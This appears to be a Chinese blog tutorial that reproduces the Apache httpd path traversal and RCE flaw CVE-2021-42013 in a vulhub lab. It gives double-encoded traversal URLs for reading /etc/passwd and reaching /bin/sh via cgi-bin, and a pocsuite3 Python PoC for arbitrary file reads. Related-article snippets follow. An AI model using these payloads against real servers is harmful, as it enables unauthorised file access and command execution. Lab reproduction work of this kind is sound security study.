Vulhu [ CVE-2021-42013 ] 漏洞复现

已于 2025-03-04 18:04:42 修改
阅读量807 收藏 14
点赞数 22
文章标签: python
于 2025-03-01 17:50:23 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/m0_65256346/article/details/145943055
版权

一.搭建vulhub环境

基础环境:centos7

搭建步骤:

1.安装docker

curl -s https://get.docker.com/ | sh

2.安装docker compose

Docker-compose基于Python开发,所以我们可以使用pip进行安装。

2.1 先安装pip

curl -s https://bootstrap.pypa.io/get-pip.py | python3

2.2下载vulhub靶场

pip install docker-compose

二、启动靶场

1.cd到靶场目录

cd /vulhub/httpd/CVE-2021-42013

2. 启动靶场

2.1 Docker Compose 介绍

Docker Compose是一个用来方便地管理多个 Docker 容器的工具,

2.2 docker-compose build 构建

这一步可以省略,当配置文件更新的时候可以执行,因为docker compose up -d 是包含docker-compose build的

docker compose build

2.3 docker-compose up -d 启动靶场

docker-compose up -d

2.3 访问靶场

curl 127.0.0.1:8080

到这里环境就启动完成了

三、漏洞复现

1.漏洞介绍

Apache HTTP 服务器项目致力于开发和维护用于现代操作系统(包括 UNIX 和 Windows)的开源 HTTP 服务器。

CVE-2021-42013 是由于CVE-2021-41773未完全修复而导致的漏洞,攻击者可以利用路径遍历攻击将 URL 映射到由类似 Alias 的指令配置的目录之外的文件。若httpd中开启CGI功能,攻击者可以构造恶意请求,造成远程代码执行。

此漏洞影响 Apache HTTP Server 2.4.49 和 2.4.50,但不影响早期版本。

2. 前置知识点

前提知识点,URL编码,路径穿越漏洞

2.1.1 路径穿越漏洞概述

路径穿越漏洞,也叫做目录穿越漏洞,是一种常见的web安全漏洞。通过这个漏洞,攻击者可以访问服务器不让用户访问的文件。比如网站之外的目录:服务器的文件
,数据库的文件等等。

2.1.2 路径穿越漏洞的工作原理

  1. 正常的文件访问
    假设你在访问一个WEB应用,它允许你查看某个文件的内容。比如,网站允许你查看自己的个人资料文件,通过这样的URL范文
http:// sese.com/movie?file=sese.mp4
  1. 攻击利用路径穿越
    攻击者并不满足只看sese图片,他们知道系统可能存在路径穿越漏洞。于是他们在file参数中输入一个特殊的路径:../../,表示返回上一级目录。
http://sese.com/movie?file=../../../../etc/passwd
  1. 路径穿越的攻击方法
    (1)基本的路径穿越就是 ../
    (2)URL编码:
    对…/进行编码,比如…/编码结果就是%2E%2E%2F;还可以进行重复编码,比如%2E%2E %25 2F (%25对应%)。
    (3)Unicode编码:
    有些应用会对Unicode编码做不当处理,攻击者可能利用Unicode编码字符来绕过过滤。比如,../的Unicode编码可能是 ..\u002E\002E\u002F
    (4)结合多种编码方式进行攻击
    攻击者可以通过多次编码,或者通过..%等字符的结合,来增加攻击的复杂性,使应用更难检测和组织。

2.2.1 URL 编码特征

1.URL编码的基本规则
特殊字符(如空格、/、?、&等)需要进行编码。
每个被编码的字符一%开头,后门跟两个十六进制数字。
例如,空格字符 会被编码为%20
2.常见编码
空格:%20 或 +(在查询参数中通常表示空格)
.:%2E
!:%21
#:%23
%:%25
&:%26
/:%2F
=:%3D
?:%3F

3.漏洞利用

(1)自己的环境当然可以先进去看一下目录了。
在这里插入图片描述
(2)编辑url目录穿越(使用一些url转码的工具)
先对.进行编码%2e,再通过编码服用对2编码%32,再对e进行编码复用%65,最后进行组合%%32%65解码为%2e
最后构造的url为http:127.0.0.1:8080/icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd
在这里插入图片描述
(3)命令执行,当http服务器开启了mods cgi 或 cgid 后,此路径遍历漏洞将允许任意命令执行。
请求路径

http://10.4.7.5:8080/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh

如何开启cgi和cgid 在httpd.conf文件中去除掉 下凡这两个模块的注释即可,如图
在这里插入图片描述
在这里插入图片描述

四、POC编写

使用pocsuite3框架编写。
pocsuite3一共三个主要关键函数_verify,_attack,_shell,
_verify:漏洞验证模式,如果当在命令行执行的时候不带任何参数,默认会执行本函数
_atack:攻击模式,调用的时候加上–attack参数
shell:getshell模式,要针对服务器的类型来反弹shell
options:设置参数,参数模板。

from collections import OrderedDict
import requests
from pocsuite3.api import (
    Output,
    POCBase,
    POC_CATEGORY,
    register_poc,
    VUL_TYPE,
    get_listener_ip,
    get_listener_port,
)
from pocsuite3.lib.core.interpreter_option import (
    OptString,
    OptDict,
    OptIP,
    OptPort,
    OptBool,
    OptInteger,
    OptFloat,
    OptItems,
)
from pocsuite3.modules.listener import REVERSE_PAYLOAD

class DemoPOC(POCBase):
    author = "dwyi"  # PoC作者的大名
    pocDesc = """
            任意文件读取,在cgi和cgid两个模块开启的情况下可任意命令执行
        """  # POC用法描述

    def _options(self):
        pass
        opt = OrderedDict()  # value = self.get_option('key')
         #OptInteger是整型,OptString是字符型
        opt["fpath"] = OptString(
            "/etc/passwd", description="读取文件路径", require=False
        )
        return opt

    def _exploit(self,param=''):
        target_url = self.target + f"/icons/.%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/{param}"
        req = requests.Request("GET", target_url)
        prepared = req.prepare()
        prepared.url = target_url
        session = requests.Session()
        res = session.send(prepared, timeout=10)
        return res

    def _verify(self):
        output = Output(self)  #打印、显示或者记录漏洞验证过程中的结果信息,将想要给用户看的信息展示给用户看
        result = {}
        param = self.get_option('fpath')
        # print(param)
        res = self._exploit(param)
        if "root" in res.text:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url
            result['VerifyInfo'][param] = res
        # 统一调用 self.parse_output() 返回结果
        return self.parse_output(result)


    def _attack(self):
        output = Output(self)
        # 攻击代码

        param = self.get_option('fpath')
        res = self._exploit(param)
        print(res.text)



# 注册 DemoPOC 类
register_poc(DemoPOC)

五,注意点

requests模块会对输入的url自动编码,而通过使用requests库中的对象PreparedRequest可以解决这个问题。

1、PreparedRequest对象介绍

PreparedRequest是requests库中的一个对象,代表以及构造好、预处理完成的HTTP请去,在需要精细控制请求的发送过程时候使用。
构建过程
原始请求:你写一个草稿(使用 requests.Request),还没有经过最终处理。
准备请求:调用 .prepare() 方法,就像检查、格式化和完善信件内容,这时就生成了 PreparedRequest。
发送请求:这个准备好的请求对象包含了所有必要的信息(例如 URL、请求头、请求体等),然后直接用来发送网络请求

target_url = self.target + f"/icons/.%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/{param}"
#构造 Request 对象
req = requests.Request("GET", target_url)

#调用 prepare() 生成 PreparedRequest 对象
prepared = req.prepare()

#覆盖 PreparedRequest 的 url 属性,确保保持原始的 raw_url
prepared.url = target_url

#使用 Session 发送这个 PreparedRequest
session = requests.Session()
res = session.send(prepared, timeout=10)
道无意
关注
CVE-2021-42013 Apache路径穿越&命令执行漏洞复现
afei001
10-10 2530
目录 1.漏洞概述 2.影响版本 3.漏洞等级 4.漏洞复现 4.3 CVE-2021-42013 POC 5.修复建议 1.漏洞概述 CVE-2021-42013是由于对CVE-2021-41773 Apache HTTPd 2.4.49 路径穿越漏洞的修复不完善,攻击者可构造恶意请求绕过补丁,利用穿越漏洞读取到Web目录之外的其他文件。同时若Apache HTTPd开启了cgi支持,攻击者可构造恶意请求执行命令,控制服务器。 2.影响版本 仅影响...
vulhub漏洞复现
qq_30854761的博客
04-26 4287
下载镜像 1 docker pull medicean/vulapps:s_shiro_1 直接运行镜像,将docker的8080端口映射到本地的 8080上 1 docker run -d -p 8080:8080 medicean/vulapps:s_shiro_1 获取复现需要用到的ysoserial工具 若无mvn则自行下载安装 1 2 3 git clone..
CVE-2021-42013 漏洞复现
Jay17的博客
02-10 756
CVE-2021-42013 漏洞复现
Vulhub漏洞复现
weixin_45995579的博客
09-30 1871
蔚莱. 1.环境搭建 下载vulhub压缩包,解压到Ubuntu16.04系统下。 进入到Tomcat put 漏洞对应的CVE漏洞编号/vulhub-master/httpd/ssi-rce路径下,执行如下两条命令: docker-compose build docker-compose up -d 网站的配置文件在当前路径下的docker-compose.yml文件内: 【注】:CVE漏洞环境默认开启的端口是8080,当要同时开启多个CVE漏洞环境时需要
vulhub-漏洞复现(Spring Data Rest 远程命令执行漏洞CVE-2017-8046))
weixin_45095113的博客
12-08 585
vulhub漏洞复现
Weblogic反序列化远程代码执行漏洞CVE-2019-2725)复现
hackzkaq的博客
03-10 4505
更多黑客技能 公众号:小道黑客 0x01 漏洞描述: wls9-async等组件为WebLogic Server提供异步通讯服务,默认应用于WebLogic部分版本。由于该WAR包在反序列化处理输入信息时存在缺陷,攻击者通过发送精心构造的恶意 HTTP 请求,即可获得目标服务器的权限,在未授权的情况下远程执行命令。 0x02 影响版本: Oracle WebLogic Server10.x Oracle WebLogic Server12.1.3.0.0 0x03 影响组件: wls9_async_res
vulhub中Weblogic未授权远程代码执行漏洞复现 (CVE-2023-21839)
yougexiaojiuguan的博客
03-10 493
漏洞复现过程的记录
Apache Flink漏洞CVE-2020-17519)复现
玄道的网安博客
01-06 5965
简介 Apache Flink是一个开源流处理框架,具有强大的流处理和批处理功能。 漏洞概述 Apache Flink 1.11.0中引入的一个更改(也在1.11.1和1.11.2中发布)允许攻击者通过JobManager进程的REST接口读取JobManager本地文件系统上的任何文件。 影响版本 1.11.0、1.11.1、1.11.2 环境搭建 使用vulhub进行安装 Vulhub地址: https://github.com/vulhu...
kali linux安装vulhub
AboutLzs的博客
04-13 5264
kali linux中vulhub环境搭建,详解带截图!
CVE-2021-42013 Apache HTTP Server 路径穿越漏洞——漏洞复现
qq_60905276的博客
06-07 5644
Apache 披露了一个在 Apache HTTP Server 2.4.49 上引入的漏洞,称为 CVE-2021-41773。
CVE-2021-42013  Apache HTTP Server 路径穿越漏洞
蚁景网安学院
03-03 2804
前言CVE-2021-42013为目录穿越文件读取漏洞,影响 httpd 2.4.49,CVE编号为CVE-2021-41773, https 2.4.50不完全修复可绕过,如果开启 mo...
Kali 搭建Vulhub靶场 (详细)
qq_43508668的博客
04-21 1729
这里写目录标题安装Docker安装pip安装docker-compose下载Vulhub 安装Docker 检查软件更新 apt-get update 安装https协议、CA证书 apt-get install -y apt-transport-https ca-certificates 安装docker apt install docker.io docker -v 查看是否安装成功 启动docker systemctl start docker 显示docker信息 docker ps -
vulhub中漏洞复现1
xhscxj的博客
05-23 2084
CVE-2018-18778 CVE-2018-18778是基于mini_httpd的一个任意文件读取漏洞 Mini_httpd是一个微型的Http服务器,在占用系统资源较小的情况下可以保持一定程度的性能(约为Apache的90%),因此广泛被各类IOT(路由器,交换器,摄像头等)作为嵌入式服务器。而包括华为,zyxel,海康威视,树莓派等在内的厂商的旗下设备都曾采用Mini_httpd组件。 影响版本:ACME mini_httpd before 1.30 分析 当mini_httpd开启虚拟主机时,此
vulhub-Struts2-045(CVE-2017-5638)漏洞复现
m0_62008601的博客
07-31 2119
struts2重要漏洞之一
vulhub】Weblogic(CVE-2018-2628)漏洞复现
qq_45300786的博客
04-10 3034
一、什么是WebLogic WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。 先提几个概念 JRMP:java remote method protocol,Java远程方法协议 JRMP是的Java技术协议的具
Vulhub:Redis[漏洞复现]
如有错误感谢斧正
12-17 1154
我们借助Lua沙箱中遗留的变量`package`的`loadlib`函数来加载动态链接库`/usr/lib/x86_64-linux-gnu/liblua5.1.so.0`里的导出函数`luaopen_io`。Debian以及Ubuntu发行版的源在打包Redis时,不慎在Lua沙箱中遗留了一个对象`package`,攻击者可以利用这个对象提供的方法加载动态链接库liblua里的函数,进而逃逸沙箱执行任意命令。服务启动后,我们可以使用`redis-cli -h your-ip`连接这个redis服务器。
vulhub-spring漏洞复现
qq_51922767的博客
09-14 2999
vulhub-spring漏洞复现
cve-2021-漏洞复现
最新发布
01-02
### CVE-2021系列漏洞复现实例 #### CVE-2021-34429 Jetty WEB-INF文件读取漏洞复现 对于Jetty服务器中的CVE-2021-34429漏洞,该缺陷允许攻击者通过特定路径访问受保护的WEB-INF目录下的资源。为了验证此安全问题的存在,在实验环境中启动了受影响版本的服务,并利用浏览器尝试获取敏感配置文件。 当部署好存在漏洞的应用程序之后,可以通过如下URL请求查看是否存在未授权的信息泄露情况: ``` http://<target-ip>:8080/ ``` 其中`<target-ip>`应替换为目标机器的实际IP地址[^1]。 一旦成功连接到服务端口并正确构建查询字符串,则可能返回不应该公开的内容片段,证明了潜在的安全风险确实存在于当前设置之中。 停止测试环境的操作命令为`docker-compose down`以便清理所有关联容器及其网络结构。 ```bash docker-compose down ``` #### CVE-2021-31805 Struts2 OGNL注入漏洞(S2-062) 针对Struts框架里的CVE-2021-31805即S2-062事件,它涉及到了恶意OGNL表达式的执行能力,从而实现远程代码控制的目的。要重现这一现象,通常会构造特殊的HTTP参数提交给易受攻击的应用接口,这些参数包含了精心设计过的脚本逻辑用于突破默认防护机制。 例如,可以向应用程序发送带有特殊构造的数据包,触发后台解析过程中存在的弱点,进而达到任意指令下发的效果。具体操作方式依赖于目标平台的具体实现细节以及所使用的组件库版本号等因素影响下而有所不同[^2]。 #### WebLogic CVE-2021-2394 反序列化RCE漏洞 关于Oracle WebLogic Server内的CVE-2021-2394问题,这是一种基于Java对象流处理不当引发的远程命令执行隐患。由于其内部某些功能模块未能充分校验外部输入数据的有效性和安全性,使得经过特别编码后的二进制串能够在未经适当审查的情况下被加载运行,最终造成不受限权限滥用的可能性增加。 这种类型的攻击往往涉及到复杂的技术手段组合应用,比如结合其他已知漏洞形成更强大的穿透力;同时也要注意官方给出的各种修复建议和补丁更新信息,及时采取措施防止此类威胁扩散蔓延开来[^3]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值